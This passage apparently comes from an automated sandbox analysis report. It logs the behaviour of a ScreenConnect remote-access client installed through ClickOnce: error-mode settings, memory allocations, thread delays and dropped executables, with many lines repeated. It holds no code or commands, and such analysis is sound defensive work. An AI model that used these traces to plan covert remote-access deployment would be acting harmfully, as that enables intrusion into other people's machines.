                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 1E8B2260000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 1E8CBC80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeMemory allocated: 14D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeMemory allocated: 1B150000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeMemory allocated: 10A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeMemory allocated: 2E40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeMemory allocated: 14E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeMemory allocated: 1610000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeMemory allocated: 3610000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeMemory allocated: 2860000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeMemory allocated: 1AA40000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 782Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 3039Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 5603Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
